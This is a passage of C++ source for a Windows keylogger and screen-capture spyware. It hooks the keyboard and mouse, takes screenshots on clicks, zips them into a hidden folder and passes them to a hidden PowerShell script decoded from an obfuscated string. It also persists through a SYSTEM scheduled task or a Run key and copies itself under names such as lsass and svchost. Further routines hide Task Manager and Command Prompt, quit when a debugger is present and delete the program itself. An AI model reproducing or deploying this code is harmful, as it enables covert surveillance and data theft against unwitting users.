PY\\sLYfVTkEfL|Y|XodrzILi2FKqTZ[SDZccTkEfH|Y|XodrzILi2FKmL5d5P5ejDJLM2HOdPZ\\wnIdmCURiyYcj3Y\\mqCc2HIW|TY\\{PILiSpdnTpdxPWN2X4Ti2FK|XodrzIL"); 775 | 776 | WriteFile(PS1File, a.c_str(), (DWORD)strlen(a.c_str()), &WrittenBytes, NULL); 777 | CloseHandle(PS1File); 778 | Command = SysDir; 779 | Command += " /C PowerShell.exe -ExecutionPolicy Unrestricted -command \""; 780 | Command += Powershell; 781 | Command += "\""; 782 | ShellExecuteA(NULL, "open", SysDir, Command.c_str(), NULL, SW_HIDE); 783 | } 784 | 785 | ULONG WINAPI ScreenGrabber(LPVOID Parameter) { //remove old emailer 786 | 787 | char* AppData = nullptr; 788 | DWORD Size = MAX_LENGTH + 1; 789 | size_t AppDataSize; 790 | _dupenv_s(&AppData, &AppDataSize, "APPDATA"); 791 | std::string CurrentLog; 792 | char PathToFile[MAX_PATH]; 793 | HMODULE GetModH = GetModuleHandle(NULL); 794 | GetModuleFileNameA(GetModH, PathToFile, sizeof(PathToFile)); 795 | //strcat_s(AppData, sizeof(AppData), "\\MagikGlass"); 796 | std::string ScreenshotDir = AppData; 797 | ScreenshotDir += "\\MicrosoftApps"; 798 | //ScreenshotDir += std::to_string(rand() % 10000+1000); 799 | DWORD DWFlags; 800 | 801 | while (1) { 802 | std::this_thread::sleep_for(std::chrono::seconds(3)); 803 | DeleteDirectory(ScreenshotDir); 804 | std::this_thread::sleep_for(std::chrono::seconds(3)); 805 | CreateDirectoryA(ScreenshotDir.c_str(), NULL); 806 | SetFileAttributesA(ScreenshotDir.c_str(), FILE_ATTRIBUTE_HIDDEN); 807 | 808 | if (ScreenshotMode == 1) { 809 | for (int i = 0; i < ScreenshotsPerZip; i++) { 810 | CurrentLog = ScreenshotDir; 811 | CurrentLog += "\\ScreenShot"; 812 | CurrentLog += std::to_string(rand() % 10000 + 1000); 813 | CurrentLog += ".png"; 814 | 815 | TakeScreenShot(CurrentLog.c_str()); 816 | 817 | Sleep(ScreenshotDelay * 1000); 818 | } 819 | } 820 | else if (ScreenshotMode == 2) { 821 | std::thread t2(Hooker, WH_MOUSE_LL, MouseThread); 822 | while (!mutex2) { 823 | std::this_thread::sleep_for(std::chrono::seconds(3)); 824 | } 825 | t2.join(); 826 | } 827 | std::string ZipPath = ScreenshotDir; 828 | ZipPath += "\\Zip"; 829 | ZipPath += std::to_string(rand() % 10000 + 1000); 830 | ZipPath += ".zip"; 831 | 832 | FILE* f = fopen(ZipPath.c_str(), "wb"); 833 | fwrite("\x50\x4B\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 22, 1, f); 834 | fclose(f); 835 | 836 | const char* files[] = { 837 | ScreenshotDir.c_str() 838 | }; 839 | { 840 | CoInitialize(NULL); 841 | CopyItems(std::cbegin(files), std::cend(files), ZipPath.c_str()); 842 | CoUninitialize(); 843 | } 844 | 845 | if (!InternetGetConnectedState(&DWFlags, NULL)) { 846 | //SetUploadTask(Emailer, ZipPath); 847 | } 848 | else { 849 | 850 | (CalculateDirSize(CurrentLog) > ScreenshotsPerZip); 851 | std::string ZipPath1 = ZipPath; 852 | std::thread t(RunPS1File, ZipPath1); 853 | t.detach(); //takes approx 45 seconds for this to action. 854 | std::this_thread::sleep_for(std::chrono::seconds(35)); 855 | 856 | } 857 | 858 | Counter2 = 0; 859 | mutex2 = !mutex2; 860 | std::this_thread::sleep_for(std::chrono::minutes(2)); 861 | DeleteDirectory(ZipPath); //double check it deletes so there is no extra images in next zip file 862 | } 863 | } 864 | 865 | int CalculateDirSize(std::string DirectoryToCheck) { 866 | 867 | HANDLE hFind; 868 | WIN32_FIND_DATAA data; 869 | 870 | DirectoryToCheck += "\\*.*"; 871 | 872 | int FileCounter = 0; 873 | 874 | //char FilePath[MAX_PATH + 1]; 875 | DWORD FileSize = MAX_PATH + 1; 876 | 877 | hFind = FindFirstFileA(DirectoryToCheck.c_str(), &data); 878 | if (hFind != INVALID_HANDLE_VALUE) { 879 | do { 880 | //GetFinalPathNameByHandleA(hFind, FilePath, FileSize, 0x0); 881 | //if (!(GetFileAttributesA(FilePath) & FILE_ATTRIBUTE_DIRECTORY)) { 882 | FileCounter++; 883 | //} 884 | } while (FindNextFileA(hFind, &data)); 885 | FindClose(hFind); 886 | } 887 | 888 | return FileCounter; 889 | } 890 | 891 | 892 | void CreateRegistryKey(PCSTR AppName, PCSTR PathToExe) 893 | { 894 | HKEY hKey = NULL; 895 | char szValue[MAX_PATH] = {}; 896 | std::string Cmd; 897 | strcpy_s(szValue, "\""); 898 | strcat_s(szValue, PathToExe); 899 | strcat_s(szValue, "\" "); 900 | if (IsElevated()) { 901 | Cmd = "/delete /tn \""; 902 | Cmd += AppName; 903 | Cmd += "\" /f"; 904 | ShellExecuteA(NULL, "open", "schtasks.exe", Cmd.c_str(), NULL, SW_HIDE); 905 | Cmd = "/create /sc onlogon /tn \""; 906 | Cmd += AppName; 907 | Cmd += "\" /tr "; 908 | Cmd += szValue; 909 | Cmd += " /ru \"SYSTEM\""; 910 | ShellExecuteA(NULL, "open", "schtasks.exe", Cmd.c_str(), NULL, SW_HIDE); 911 | } 912 | else { 913 | RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &hKey, NULL); 914 | RegSetValueExA(hKey, AppName, 0, REG_SZ, (BYTE*)szValue, strlen(szValue) + 1); 915 | RegCloseKey(hKey); 916 | } 917 | return; 918 | } 919 | 920 | ULONG WINAPI Protect(LPVOID Parameter) { 921 | 922 | if (IsDebuggerPresent()) { 923 | exit(0); 924 | } 925 | while (1) { 926 | 927 | HWND Prog; 928 | Prog = FindWindowA(NULL, "Task Manager"); 929 | ShowWindow(Prog, 0); 930 | Prog = FindWindowA(NULL, "Windows Task Manager"); 931 | ShowWindow(Prog, 0); 932 | Prog = FindWindowA(NULL, "Command Prompt"); 933 | ShowWindow(Prog, 0); 934 | Prog = FindWindowA(NULL, "C:\\Windows\\System32\\cmd.exe"); 935 | ShowWindow(Prog, 0); 936 | Prog = FindWindowA(NULL, "Run"); 937 | ShowWindow(Prog, 0); 938 | Sleep(200); 939 | } 940 | return 0; 941 | } 942 | 943 | std::string GetCpuInfo() 944 | { 945 | std::array integerBuffer = {}; 946 | constexpr size_t sizeofIntegerBuffer = sizeof(int) * integerBuffer.size(); 947 | std::array charBuffer = {}; 948 | constexpr std::array functionIds = { 949 | 0x8000'0002, 950 | 0x8000'0003, 951 | 0x8000'0004 952 | }; 953 | std::string cpu; 954 | for (int id : functionIds) 955 | { 956 | __cpuid(integerBuffer.data(), id); //since its x64 use __cpuid instead of inline asm 957 | std::memcpy(charBuffer.data(), integerBuffer.data(), sizeofIntegerBuffer); 958 | cpu += std::string(charBuffer.data()); 959 | } 960 | return cpu; 961 | } 962 | 963 | BOOL fexists(std::string filename) { 964 | DWORD dwAttrib = GetFileAttributes(filename.c_str()); 965 | 966 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && 967 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 968 | } 969 | 970 | void FinalExit() { 971 | char PathToSelf[MAX_PATH]; 972 | GetModuleFileNameA(NULL, PathToSelf, MAX_PATH); 973 | std::string Command = "/C timeout 3 /nobreak > Nul & Del /f /q \""; 974 | Command += PathToSelf; 975 | Command += "\""; 976 | ShellExecuteA(0, "open", "cmd.exe", Command.c_str(), 0, SW_HIDE); 977 | exit(0); 978 | } 979 | 980 | std::string HardDecode(std::string EncodedString) { 981 | std::string Buf; 982 | for (int i = EncodedString.size() - 1; i >= 0; i--) { Buf += EncodedString[i] - 1; } 983 | Base64::decode(Buf, &EncodedString); 984 | return EncodedString; 985 | } 986 | 987 | LRESULT CALLBACK KeyboardThread(int nCode, WPARAM wParam, LPARAM lParam) 988 | { 989 | BOOL fEatKeystroke = FALSE; 990 | KBDLLHOOKSTRUCT* keyboard = (KBDLLHOOKSTRUCT*)lParam; 991 | if (nCode == HC_ACTION) 992 | { 993 | switch (wParam) 994 | { 995 | case WM_KEYDOWN: 996 | if (Counter >= CharactersPerLog) { 997 | mutex = true; 998 | ExitThread(0); 999 | } 1000 | if (LogMode == 2) { 1001 | Counter++; 1002 | } 1003 | MyLog.LogItInt(keyboard->vkCode); 1004 | 1005 | break; 1006 | case WM_SYSKEYDOWN: 1007 | break; 1008 | case WM_KEYUP: 1009 | break; 1010 | case WM_SYSKEYUP: 1011 | break; 1012 | } 1013 | } 1014 | return(fEatKeystroke ? 1 : CallNextHookEx(NULL, nCode, wParam, lParam)); 1015 | } 1016 | 1017 | int Hooker(int HookType, HOOKPROC CallbackFunc) 1018 | { 1019 | // Install the low-level keyboard & mouse hooks 1020 | HHOOK hhkLowLevelKybd = SetWindowsHookExA(HookType, CallbackFunc, 0, 0); 1021 | 1022 | // Keep this app running until we're told to stop 1023 | MSG msg; 1024 | while (!GetMessage(&msg, NULL, NULL, NULL)) { //this while loop keeps the hook 1025 | TranslateMessage(&msg); 1026 | DispatchMessage(&msg); 1027 | } 1028 | 1029 | UnhookWindowsHookEx(hhkLowLevelKybd); //unhook regardless of mutex state if the thread is forced to close 1030 | 1031 | return(0); 1032 | } 1033 | 1034 | LRESULT CALLBACK MouseThread(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam) { 1035 | 1036 | MSLLHOOKSTRUCT* Mouse = (MSLLHOOKSTRUCT*)lParam; 1037 | if (wParam == WM_LBUTTONDOWN || wParam == WM_RBUTTONDOWN) { 1038 | if (Counter2 >= ScreenshotsPerZip) { 1039 | mutex2 = true; 1040 | ExitThread(0); //kill the entire thread when done 1041 | } 1042 | char* AppData = nullptr; 1043 | DWORD Size = MAX_LENGTH + 1; 1044 | size_t AppDataSize; 1045 | _dupenv_s(&AppData, &AppDataSize, "APPDATA"); 1046 | std::string ScreenshotName = AppData; 1047 | ScreenshotName += "\\MicrosoftApps\\SC_"; 1048 | if (wParam == WM_LBUTTONDOWN) 1049 | ScreenshotName += "LCLICK_"; 1050 | if (wParam == WM_RBUTTONDOWN) 1051 | ScreenshotName += "RCLICK_"; 1052 | ScreenshotName += "x"; 1053 | ScreenshotName += std::to_string(Mouse->pt.x); 1054 | ScreenshotName += "y"; 1055 | ScreenshotName += std::to_string(Mouse->pt.y); 1056 | ScreenshotName += "_"; 1057 | ScreenshotName += std::to_string(GetTickCount()); 1058 | ScreenshotName += ".png"; 1059 | TakeScreenShot(ScreenshotName.c_str()); 1060 | Counter2++; 1061 | } 1062 | return CallNextHookEx(NULL, nCode, wParam, lParam); 1063 | } 1064 | 1065 | void TimerThread() { 1066 | std::this_thread::sleep_for(std::chrono::minutes(LogTimer)); 1067 | if (LogMode == 1) { 1068 | Counter = CharactersPerLog; 1069 | } 1070 | ExitThread(0); 1071 | } 1072 | 1073 | std::string RetrieveExternalIp(std::string CurrentDir) { 1074 | std::string Ret; 1075 | std::string VersionFile = CurrentDir; 1076 | VersionFile += "\\ExtIP.txt"; 1077 | URLDownloadToFileA(NULL, "https://api.my-ip.io/ip.txt", VersionFile.c_str(), 0, NULL); 1078 | SetFileAttributesA(VersionFile.c_str(), FILE_ATTRIBUTE_HIDDEN); 1079 | std::ifstream VersionFileIO(VersionFile); 1080 | if (!VersionFileIO.eof()) { 1081 | std::getline(VersionFileIO, Ret, '\0'); 1082 | } 1083 | VersionFileIO.close(); 1084 | DeleteFileA(VersionFile.c_str()); 1085 | return Ret; 1086 | } 1087 | 1088 | BOOL IsElevated() { 1089 | BOOL fRet = FALSE; 1090 | HANDLE hToken = NULL; 1091 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 1092 | TOKEN_ELEVATION Elevation; 1093 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 1094 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 1095 | fRet = Elevation.TokenIsElevated; 1096 | } 1097 | } 1098 | if (hToken) { 1099 | CloseHandle(hToken); 1100 | } 1101 | return fRet; 1102 | } 1103 | 1104 | std::string QueryWMI(bstr_t Table, const wchar_t* Item, int Type) { 1105 | 1106 | HRESULT hres; 1107 | hres = CoInitializeEx(0, COINIT_MULTITHREADED); 1108 | hres = CoInitializeSecurity( 1109 | NULL, 1110 | -1, // COM authentication 1111 | NULL, // Authentication services 1112 | NULL, // Reserved 1113 | RPC_C_AUTHN_LEVEL_DEFAULT, // Default authentication 1114 | RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation 1115 | NULL, // Authentication info 1116 | EOAC_NONE, // Additional capabilities 1117 | NULL // Reserved 1118 | ); 1119 | IWbemLocator* pLoc = NULL; 1120 | hres = CoCreateInstance( 1121 | CLSID_WbemLocator, 1122 | 0, 1123 | CLSCTX_INPROC_SERVER, 1124 | IID_IWbemLocator, (LPVOID*)&pLoc); 1125 | IWbemServices* pSvc = NULL; 1126 | hres = pLoc->ConnectServer( 1127 | _bstr_t(L"ROOT\\CIMV2"), // Object path of WMI namespace 1128 | NULL, // User name. NULL = current user 1129 | NULL, // User password. NULL = current 1130 | 0, // Locale. NULL indicates current 1131 | NULL, // Security flags. 1132 | 0, // Authority (for example, Kerberos) 1133 | 0, // Context object 1134 | &pSvc // pointer to IWbemServices proxy 1135 | ); 1136 | hres = CoSetProxyBlanket( 1137 | pSvc, // Indicates the proxy to set 1138 | RPC_C_AUTHN_WINNT, // RPC_C_AUTHN_xxx 1139 | RPC_C_AUTHZ_NONE, // RPC_C_AUTHZ_xxx 1140 | NULL, // Server principal name 1141 | RPC_C_AUTHN_LEVEL_CALL, // RPC_C_AUTHN_LEVEL_xxx 1142 | RPC_C_IMP_LEVEL_IMPERSONATE, // RPC_C_IMP_LEVEL_xxx 1143 | NULL, // client identity 1144 | EOAC_NONE // proxy capabilities 1145 | ); 1146 | IEnumWbemClassObject* pEnumerator = NULL; 1147 | hres = pSvc->ExecQuery( 1148 | bstr_t("WQL"), 1149 | Table, 1150 | WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, 1151 | NULL, 1152 | &pEnumerator); 1153 | IWbemClassObject* pclsObj = NULL; 1154 | ULONG uReturn = 0; 1155 | std::string Ret = {}; 1156 | while (pEnumerator) 1157 | { 1158 | HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, 1159 | &pclsObj, &uReturn); 1160 | 1161 | if (0 == uReturn) 1162 | { 1163 | break; 1164 | } 1165 | 1166 | VARIANT vtProp; 1167 | VariantInit(&vtProp); 1168 | hr = pclsObj->Get(Item, 0, &vtProp, 0, 0); 1169 | VariantClear(&vtProp); 1170 | switch (Type) { 1171 | case 1: 1172 | Ret = _com_util::ConvertBSTRToString(vtProp.bstrVal); 1173 | break; 1174 | case 2: 1175 | Ret = std::to_string(vtProp.uintVal); 1176 | break; 1177 | default: 1178 | break; 1179 | } 1180 | pclsObj->Release(); 1181 | } 1182 | 1183 | pSvc->Release(); 1184 | pLoc->Release(); 1185 | pEnumerator->Release(); 1186 | CoUninitialize(); 1187 | 1188 | return Ret; 1189 | } 1190 | 1191 | void FirstSetup() { 1192 | std::string CopiedFileText = "Made executable \""; 1193 | char PathToFile[MAX_PATH]; DWORD Size; 1194 | std::string UserNameT = QueryWMI("SELECT * FROM Win32_ComputerSystem", L"Username", 1); 1195 | std::string::size_type pos = std::string(UserNameT).find_last_of("\\/"); 1196 | std::string UserName = std::string(UserNameT).substr(pos + 1, UserNameT.size()); 1197 | HMODULE GetModH = GetModuleHandle(NULL); 1198 | GetModuleFileNameA(GetModH, PathToFile, sizeof(PathToFile)); 1199 | const char* appDataPath = std::getenv("APPDATA"); 1200 | std::string DestinationFile(appDataPath); 1201 | DestinationFile += "\\System"; 1202 | //std::string DestinationFile = "C:\\Users\\"; 1203 | //DestinationFile += UserName; 1204 | //DestinationFile += "\\AppData\\Roaming\\System"; 1205 | CreateDirectoryA(DestinationFile.c_str(), NULL); 1206 | SetFileAttributesA(DestinationFile.c_str(), FILE_ATTRIBUTE_HIDDEN); 1207 | 1208 | if (CalculateDirSize(DestinationFile) > MaximumFolderSize) { 1209 | DeleteDirectory(DestinationFile); 1210 | MyLog.LogItChar("Cleaned MagikIndex folder..."); 1211 | Sleep(200); 1212 | 1213 | CreateDirectoryA(DestinationFile.c_str(), NULL); 1214 | SetFileAttributesA(DestinationFile.c_str(), FILE_ATTRIBUTE_HIDDEN); //added incase delete occurred 1215 | } 1216 | DestinationFile += "\\"; 1217 | std::string CopiedFile; 1218 | std::string CharacterSet[11] = 1219 | { "crss","wininit","lsass","smss","dwm","rundll32","taskmgr","svchost","explorer","avast" }; 1220 | for (int i = 0; i < 1; i++) { 1221 | CopiedFile += CharacterSet[rand() % 10 + 0]; 1222 | } 1223 | DestinationFile += CopiedFile; 1224 | DestinationFile += ".exe"; 1225 | CopyFileA(PathToFile, DestinationFile.c_str(), false); 1226 | CopiedFileText += CopiedFile; 1227 | CopiedFileText += ".exe\"..."; 1228 | MyLog.LogItChar(CopiedFileText); 1229 | CreateRegistryKey("System", DestinationFile.c_str()); 1230 | MyLog.LogItChar("Registered executable for startup..."); 1231 | } 1232 | 1233 | 1234 | #pragma warning( pop ) 1235 | --------------------------------------------------------------------------------